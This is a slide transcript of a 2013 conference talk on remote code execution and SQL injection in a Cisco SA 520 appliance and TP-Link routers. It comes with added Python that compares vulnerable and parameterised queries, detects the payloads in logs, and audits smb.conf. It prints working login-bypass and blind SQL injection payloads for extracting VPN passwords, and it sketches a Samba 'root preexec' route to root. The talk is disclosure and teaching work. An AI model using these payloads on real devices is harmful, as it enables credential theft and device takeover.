Embedded Devices Hacking, Confidence 2013 - Sekurak (slide transcript)
Embedded Devices Hacking Confidence 2013
Michał Sajdak, Securitum sekurak.pl
About me
Pentester / trainer
Founder of sekurak.pl
Agenda
Two examples of my research – devices hacking
SA500 – Cisco Security Appliance: unauthenticated remote code exec
Current status: patched
TP-Link routers (other devices?): unauthenticated remote code exec
Research from this year. Current status: patched?
I will present it live
Warning
All info for educational / legal use only!
First device
Cisco SA 520
First device
Cisco SA 520. Menu:
OS command exec
SQLi – login screen
Authentication data in plaintext
Let’s see
First device
Lab architecture
SQL injection - example
http://site.pl/news.php?id=10
SELECT * FROM news WHERE id = 10 AND active = 1
http://site.pl/news.php?id=10%20OR%201=1%23
SELECT * FROM news WHERE id = 10 OR 1=1# AND active = 1
(%23 is a URL-encoded #, which comments out the rest of the query, so the active = 1 check is gone and every row matches)
SQL injection
Let's go back to the SA 500 appliance
OS Commanding
SQL injection – login page?
SQL injection
SA 500 Appliance
$SQL = "SELECT * FROM users WHERE login = '$login' AND password = '$password'"
We control $login and $password
So let's use $login and $password = ' or '1'='1 which gives:
$SQL = "SELECT * FROM users WHERE login = '' or '1'='1' AND password = '' or '1'='1'"
SQL injection
SA 500 Appliance
$SQL = "SELECT * FROM users WHERE login = '' or '1'='1' AND password = '' or '1'='1'"
It returns all users from the table
Let's try this on the SA520
Here we can employ another technique: blind SQL injection exploitation
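Added example (Python, not code from the talk or the appliance): the concatenated login query from the slides beside a parameterised version, both run against a constructed in-memory SQLite table laid out like the appliance's. The tautology above and the substr() probe used later in the talk return rows only from the vulnerable function.

```python
import sqlite3

# Constructed sample rows (not the appliance's data) in the layout the talk
# describes: table SSLVPNUsers with Username and Password columns, plaintext.
SAMPLE_USERS = [("admin", "adm1nPass"), ("vpnuser", "s3cret")]

# Payloads from the talk: the tautology and the blind substr() probe.
TAUTOLOGY = "' or '1'='1"
BLIND_PROBE = ("' OR substr((SELECT Password FROM SSLVPNUsers "
               "LIMIT 1 OFFSET 0),1,1)='%s'--")


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE SSLVPNUsers (Username TEXT, Password TEXT)")
    con.executemany("INSERT INTO SSLVPNUsers VALUES (?, ?)", SAMPLE_USERS)
    return con


def login_vulnerable(con, login, password):
    # String concatenation, as on the SA 500 login page: the attacker controls
    # both values, so a quote in either one changes the structure of the query.
    sql = ("SELECT Username FROM SSLVPNUsers WHERE Username = '%s' "
           "AND Password = '%s'" % (login, password))
    return sorted(row[0] for row in con.execute(sql))


def login_fixed(con, login, password):
    # Bound parameters: the driver hands values to SQLite separately from the
    # SQL text, so quotes, OR clauses and comments in the input stay data.
    sql = "SELECT Username FROM SSLVPNUsers WHERE Username = ? AND Password = ?"
    return sorted(row[0] for row in con.execute(sql, (login, password)))


def demo():
    """Run both payloads against both implementations; returns the row lists."""
    con = make_db()
    return {
        "tautology_vuln": login_vulnerable(con, TAUTOLOGY, TAUTOLOGY),
        "tautology_fixed": login_fixed(con, TAUTOLOGY, TAUTOLOGY),
        "probe_hit_vuln": login_vulnerable(con, BLIND_PROBE % "a", "x"),
        "probe_miss_vuln": login_vulnerable(con, BLIND_PROBE % "z", "x"),
        "probe_hit_fixed": login_fixed(con, BLIND_PROBE % "a", "x"),
        "valid_fixed": login_fixed(con, "admin", "adm1nPass"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-16s %s" % (name, rows))
```

The probe returns every row from the vulnerable query exactly when the guessed letter is right, which is the boolean oracle the rest of the talk builds on; the parameterised query returns nothing for any of the payloads.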
SQL injection
SA 500 Appliance
Goal: we want all logins and passwords in plaintext (without logging into the device)
SQL injection
Next steps:
1. We need to know the DB type (SQL syntax differs between engines)
2. We need to know the table name (and its column names) where user data is stored
Both can be obtained by whitebox analysis (i.e. via the earlier OS exec vulnerability)
DB type is SQLite
The table name is SSLVPNUsers
The columns are: Username and Password
SQL injection
The full query that would return all users and passwords from the DB is:
SELECT Username, Password from SSLVPNUsers
But we can't use it directly in our case: the login screen doesn't display anything except error messages
SQL injection
We have to get all the login/password letters one by one…
How to do this? We need some SQL practice ;-)
SQL injection
SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0
Returns the password of the first user in the DB
substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)
Returns the 1st letter of the password of the first user in the DB
SQL injection
Our login will be:
' OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)='a'--
Resulting in the following query:
SELECT * FROM SSLVPNUser WHERE login = '' OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)='a'--' AND password = '$password'
Returns "invalid username" when the ='a' part is not true
Returns all users (a different error) when the ='a' part is true
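Added detection example (Python, constructed log lines, not from the talk): decode the query string of each request and flag the two patterns shown on these slides, a quoted tautology and a substr((SELECT ...)) probe with a trailing comment, grouped per source IP so that a letter-by-letter extraction stands out as a burst of hits from one address. The log format and field names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (assumed format: ip "METHOD path" status).
# 10.0.0.9 sends one request per guessed letter, differing only in the
# substr() offset or the compared character; 10.0.0.7 tries the tautology.
SAMPLE_LOG = """\
10.0.0.5 "POST /login.cgi?login=admin&password=adm1nPass" 302
10.0.0.9 "POST /login.cgi?login=%27%20OR%20substr((SELECT%20Password%20FROM%20SSLVPNUser%20LIMIT%201%20OFFSET%200),1,1)%3D%27a%27--&password=x" 200
10.0.0.9 "POST /login.cgi?login=%27%20OR%20substr((SELECT%20Password%20FROM%20SSLVPNUser%20LIMIT%201%20OFFSET%200),1,1)%3D%27b%27--&password=x" 200
10.0.0.9 "POST /login.cgi?login=%27%20OR%20substr((SELECT%20Password%20FROM%20SSLVPNUser%20LIMIT%201%20OFFSET%200),2,1)%3D%27a%27--&password=x" 200
10.0.0.7 "POST /login.cgi?login=%27%20or%20%271%27%3D%271&password=%27%20or%20%271%27%3D%271" 200
10.0.0.5 "GET /news.php?id=10" 200
"""

LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+)" (\d{3})$')

# Indicators for the techniques in the talk: a quote followed by OR '..'='..,
# a substr() wrapped around a subselect, and a comment that ends the value.
INDICATORS = {
    "tautology": re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
    "substr_probe": re.compile(r"substr\s*\(\s*\(\s*select\b", re.I),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
}


def scan(log_text):
    """Per source IP: count of matching parameter values, indicators, parameters."""
    findings = defaultdict(lambda: {"hits": 0, "indicators": set(), "params": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _method, path, _status = m.groups()
        # parse_qs decodes %27 / %20 / %3D, so the payload is inspected as the
        # application's SQL layer would have seen it.
        params = parse_qs(urlsplit(path).query, keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                matched = {k for k, rx in INDICATORS.items() if rx.search(value)}
                if matched:
                    findings[ip]["hits"] += 1
                    findings[ip]["indicators"] |= matched
                    findings[ip]["params"].add(name)
    return dict(findings)
```

A single hit is worth an alert on a login endpoint; dozens of substr_probe hits from one IP within minutes is the extraction loop itself, and the login form should reject any quote-bearing username long before the query is built.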
Second device
TP-Link TL-WDR4300
Firmware: 12.2012
Other models also affected
(possibly all?)
http://sekurak.pl/more-information-about-tp-link-backdoor/
Second device
Menu:
path traversal
chroot bypass
configuration overwrite
backdoor?
Remote code execution as root
Tftp user
They say that there is a 'standard' WiFi calibration procedure in the factory
But they forgot to remove the dev calibration software :-P
Let's see
Second device
Samba hint
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html
root preexec (S)
This is the same as the preexec parameter except that the command is run as root. This is useful for mounting filesystems (such as CDROMs) when a connection is opened.
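Added audit example (Python, not from the talk or from Samba): a minimal smb.conf reader that reports every share carrying a preexec/postexec directive, marking the root variants, which is the check to run on any device whose configuration files could have been written to from the outside. The sample configuration is constructed, not the TP-Link firmware's file.

```python
# Constructed smb.conf (assumed content, not from the TP-Link firmware): one
# share carries a root preexec command, which Samba runs as root on every
# connection to that share, whatever user the client authenticates as.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; comment lines are skipped
[usbshare]
   path = /tmp/usb
   writeable = yes
   guest ok = yes
[calib]
   path = /tmp/calib
   guest ok = yes
   root preexec = /bin/sh -c 'echo opened >> /tmp/calib.log'
"""

# Directives that run an external command on connect/disconnect; the "root"
# variants do so with full privileges (see the smb.conf man page above).
EXEC_DIRECTIVES = ("root preexec", "root postexec", "preexec", "postexec")


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {key: value}} with lowercased keys."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_smb_conf(text):
    """Return (share, directive, command, runs_as_root, guest_ok) per finding."""
    findings = []
    for share, opts in parse_smb_conf(text).items():
        guest_ok = opts.get("guest ok", "no").lower() == "yes"
        for directive in EXEC_DIRECTIVES:
            if directive in opts:
                findings.append((share, directive, opts[directive],
                                 directive.startswith("root "), guest_ok))
    return findings
```

A root preexec on a guest-accessible share means any client that can reach the SMB port gets that command run as root; on an embedded device the directive should simply not be present, and the file it lives in must not be writable by the service accounts (tftp, samba) that face the network.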
Thanks for attending
Do you like the presentation?
Vulnerabilities in HP network printers
Confirmed by HP – info to be announced soon (when the patch is available)
Contact: [email protected]